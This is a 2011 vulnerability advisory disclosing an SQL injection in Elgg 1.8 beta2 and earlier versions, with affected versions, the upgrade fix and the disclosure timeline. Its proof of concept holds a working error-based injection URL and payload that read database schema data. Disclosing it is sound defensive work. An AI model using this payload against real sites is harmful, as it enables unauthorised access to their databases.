Elgg 1.8 beta2 SQL Injection

2011-08-16 / 2011-08-17
Credit: Lostmon
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################## Elgg 1.8 beta2 and prior to 1.7.11 'container_guid' and 'owner_guid' SQL Injection Vendor URL: http://www.elgg.org/ Advisore: http://lostmon.blogspot.com/2011/08/elgg-18-beta2-and-prior-to-1711.html Vendor notify: YES exploit available: YES ################################################## ################### Description By vendor ################### Elgg is an award-winning social networking engine, delivering the building blocks that enable businesses, schools, universities and associations to create their own fully-featured social networks and applications. Organizations with networks powered by Elgg include: Australian Government, British Government, Federal Canadian Government, MITRE, The World Bank, UNESCO, NASA, Stanford University, Johns Hopkins University and more (http://elgg.org/powering.php) ###################### Vulnerability Description ###################### Elgg contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the script not properly sanitizing user-supplied input to 'container_guid' and 'owner_guid' variables upon submision to 'mod/search/pages/search/index.php' This may allow an attacker to inject or manipulate SQL queries in the backend database. ################ Versions afected ################ Elgg 1.8 beta2 vulnerable Elgg 1.7.10 and prior versions vulnerables Elgg 1.7.11 not vulnerable ################# Tecnical details ################# Injection type is Integer and it only can be exploit via Mysql error based injection method, it works with 'magic_quotes_gpc' set to 'on' or 'off' ###################### Proof Of Concept ###################### If you know what is error based injection... you know how to use it ;) URL => http://localhost/elgg/search/?q=someword&search_type=tags&container_guid=7826' Injections: and(select 1 from(select count(*),concat((select (select %column_name%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1 Count(table_name) of information_schema.tables where table_schema=0x74657374 is 75 Count(column_name) of information_schema.columns where table_schema=0x74657374 and table_name=0x62616E6C697374 is 4 ################ Solution ############### The vendor has release a updated version to solve this issue and others see changelog and update your Elgg instalation to 1.7.11 ############### Timeline ############### Discovered :July 30, 2011 Vendor Notify:July 30, 2011 Vendor response:July 30, 2011 Vendor Patch: August 15, 2011 Public Disclosure: August 15, 2011 ########################## ?nd ######################## Atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top